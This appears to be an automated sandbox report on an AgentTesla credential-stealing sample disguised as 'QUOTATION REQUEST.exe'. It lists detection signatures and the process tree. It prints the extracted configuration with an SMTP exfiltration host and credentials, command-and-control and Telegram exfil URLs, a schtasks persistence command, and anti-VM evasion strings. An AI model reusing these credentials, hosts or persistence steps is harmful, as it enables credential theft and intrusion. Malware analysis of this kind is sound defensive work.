

Analysis Report QUOTATION REQUEST.exe

Overview

General Information

Sample Name: QUOTATION REQUEST.exe
Analysis ID: 321450
MD5: 4f4f697adc79894ceec42d5752b2790e
SHA1: 390de0e89b8c1c3d07dbd12dbb0149626453d12b
SHA256: dc0cff9e3bc575333097988f46e46f1925cedf35329a749a642576601a45674c
Tags: AgentTesla, exe

Most interesting Screenshot:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AntiVM_3
.NET source code contains potential unpacker
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the hosts file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • QUOTATION REQUEST.exe (PID: 5388 cmdline: 'C:\Users\user\Desktop\QUOTATION REQUEST.exe' MD5: 4F4F697ADC79894CEEC42D5752B2790E)
    • schtasks.exe (PID: 5616 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GtVSibeZGs' /XML 'C:\Users\user\AppData\Local\Temp\tmpCA2.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 1564 cmdline: {path} MD5: 2867A3817C9245F7CF518524DFD18F28)
  • lEmohP.exe (PID: 3288 cmdline: 'C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe' MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • lEmohP.exe (PID: 5788 cmdline: 'C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe' MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "NzslbU4cHkctpk", "URL: ": "http://C0BJotQhI3.net", "To: ": "", "ByHost: ": "mail.hemetek.com:587", "Password: ": "FYw6n", "From: ": ""}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.212843504.0000000003B43000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000003.00000002.462144655.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.212271069.0000000002B21000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: QUOTATION REQUEST.exe PID: 5388 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(3 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GtVSibeZGs' /XML 'C:\Users\user\AppData\Local\Temp\tmpCA2.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GtVSibeZGs' /XML 'C:\Users\user\AppData\Local\Temp\tmpCA2.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\QUOTATION REQUEST.exe', ParentImage: C:\Users\user\Desktop\QUOTATION REQUEST.exe, ParentProcessId: 5388, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GtVSibeZGs' /XML 'C:\Users\user\AppData\Local\Temp\tmpCA2.tmp', ProcessId: 5616

Signature Overview

AV Detection:

Found malware configuration
Source: RegSvcs.exe.1564.3.memstr | Malware Configuration Extractor: Agenttesla {"Username: ": "NzslbU4cHkctpk", "URL: ": "http://C0BJotQhI3.net", "To: ": "", "ByHost: ": "mail.hemetek.com:587", "Password: ": "FYw6n", "From: ": ""}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\GtVSibeZGs.exe | ReversingLabs: Detection: 51%
Multi AV Scanner detection for submitted file
Source: QUOTATION REQUEST.exe | Virustotal: Detection: 52%
Source: QUOTATION REQUEST.exe | ReversingLabs: Detection: 51%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\GtVSibeZGs.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: QUOTATION REQUEST.exe | Joe Sandbox ML: detected
Source: 3.2.RegSvcs.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49738 -> 107.6.134.138:587
Source: global traffic | TCP traffic: 192.168.2.3:49738 -> 107.6.134.138:587
Source: Joe Sandbox View | ASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
Source: global traffic | TCP traffic: 192.168.2.3:49738 -> 107.6.134.138:587
Source: unknown | DNS traffic detected: queries for: mail.hemetek.com
Source: RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegSvcs.exe, 00000003.00000002.465723831.0000000003696000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.465745478.00000000036A0000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.465591581.0000000003659000.00000004.00000001.sdmp | String found in binary or memory: http://C0BJotQhI3.net
Source: RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp | String found in binary or memory: http://TDhznh.com
Source: RegSvcs.exe, 00000003.00000002.465723831.0000000003696000.00000004.00000001.sdmp | String found in binary or memory: http://mail.hemetek.com
Source: QUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.orgGETMozilla/5.0
Source: QUOTATION REQUEST.exe, 00000000.00000002.212843504.0000000003B43000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.462144655.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
Source: QUOTATION REQUEST.exe, 00000000.00000002.212843504.0000000003B43000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.462144655.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: QUOTATION REQUEST.exe, 00000000.00000002.211719629.0000000000CB8000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands:

Modifies the hosts file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File written: C:\Windows\System32\drivers\etc\hosts

System Summary:

Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: QUOTATION REQUEST.exe
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 0_2_00F3EB70
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 0_2_00F3EB60
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 0_2_00F3CB5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06835AA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06839BB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06835078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0683F3CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0683A300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_068324B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06831108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06833938
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe 43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
Source: QUOTATION REQUEST.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: GtVSibeZGs.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: QUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameEXkkZFSEjYYVxfCzJogyqTqLgVaACqjcpHF.exe( vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000000.00000002.211719629.0000000000CB8000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000000.00000002.214965035.0000000005020000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000000.00000002.216250775.0000000006940000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000000.00000002.211308175.0000000000542000.00000002.00020000.sdmp | Binary or memory string: OriginalFilename6 vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000000.00000002.216699272.0000000006A30000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000000.00000002.216699272.0000000006A30000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000000.00000002.212271069.0000000002B21000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameB2B.exe4 vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000000.00000002.215096302.00000000050B0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameaspnet_rc.dllT vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe | Binary or memory string: OriginalFilename6 vs QUOTATION REQUEST.exe
Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@10/8@1/1
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | File created: C:\Users\user\AppData\Roaming\GtVSibeZGs.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_01
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Mutant created: \Sessions\1\BaseNamedObjects\FZGqCPCXaSyGOD
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4576:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_01
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | File created: C:\Users\user\AppData\Local\Temp\tmpCA2.tmp
Source: QUOTATION REQUEST.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: QUOTATION REQUEST.exe, 00000000.00000000.194037544.00000000003C2000.00000002.00020000.sdmp | Binary or memory string: UPDATE [sms].[dbo].[person]set email=@email, street=@street, city=@city, district=@district, zip=@zip WHERE id=;Student Information updated!!
Source: QUOTATION REQUEST.exe | Virustotal: Detection: 52%
Source: QUOTATION REQUEST.exe | ReversingLabs: Detection: 51%
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | File read: C:\Users\user\Desktop\QUOTATION REQUEST.exe
Source: unknown | Process created: C:\Users\user\Desktop\QUOTATION REQUEST.exe 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GtVSibeZGs' /XML 'C:\Users\user\AppData\Local\Temp\tmpCA2.tmp'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
Source: unknown | Process created: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe 'C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe 'C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GtVSibeZGs' /XML 'C:\Users\user\AppData\Local\Temp\tmpCA2.tmp'
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: QUOTATION REQUEST.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: QUOTATION REQUEST.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: QUOTATION REQUEST.exe | Static file information: File size 1733120 > 1048576
Source: QUOTATION REQUEST.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x13d000
Source: QUOTATION REQUEST.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000003.00000003.335768615.00000000063F7000.00000004.00000001.sdmp, lEmohP.exe, 00000007.00000000.271543605.0000000000642000.00000002.00020000.sdmp, lEmohP.exe, 00000010.00000002.290702396.00000000005A2000.00000002.00020000.sdmp, lEmohP.exe.3.dr
Source: Binary string: System.EnterpriseServices.Wrapper.pdb source: lEmohP.exe, 00000010.00000002.291188421.0000000002940000.00000002.00000001.sdmp
Source: Binary string: RegSvcs.pdb source: lEmohP.exe, lEmohP.exe.3.dr

Data Obfuscation:

.NET source code contains potential unpacker
Source: QUOTATION REQUEST.exe, ?R?Xa?U??b??/u?sXwvU?tjxKO.cs | .Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.QUOTATION REQUEST.exe.3c0000.0.unpack, ?R?Xa?U??b??/u?sXwvU?tjxKO.cs | .Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.QUOTATION REQUEST.exe.3c0000.0.unpack, ?R?Xa?U??b??/u?sXwvU?tjxKO.cs | .Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 0_2_00F31C8B push ebx; iretd
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 0_2_00F3DF50 push eax; ret
Source: initial sample | Static PE information: section name: .text entropy: 7.33255664693
Source: initial sample | Static PE information: section name: .text entropy: 7.33255664693
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | File created: C:\Users\user\AppData\Roaming\GtVSibeZGs.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GtVSibeZGs' /XML 'C:\Users\user\AppData\Local\Temp\tmpCA2.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run lEmohP
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run lEmohP

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Process information set: NOOPENFILEERRORBOX (37 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX (52 identical entries)
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match | File source: 00000000.00000002.212271069.0000000002B21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: QUOTATION REQUEST.exe PID: 5388, type: MEMORY
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: QUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: QUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 623
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe TID: 1112 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe TID: 5400 | Thread sleep time: -41500s >= -30000s
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe TID: 6140 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe TID: 5736 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe TID: 5172 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Last function: Thread delayed
Source: QUOTATION REQUEST.exe, 00000000.00000002.212705548.0000000002E3E000.00000004.00000001.sdmp | Binary or memory string: VMware
Source: RegSvcs.exe, 00000003.00000002.467751584.00000000064B0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: QUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: QUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmp | Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: QUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmp | Binary or memory string: VMWARE
Source: RegSvcs.exe, 00000003.00000002.467684080.00000000063B0000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllurrentControlSet\Control\ProductOptions|ProductSuiteOSType
Source: QUOTATION REQUEST.exe, 00000000.00000002.212705548.0000000002E3E000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
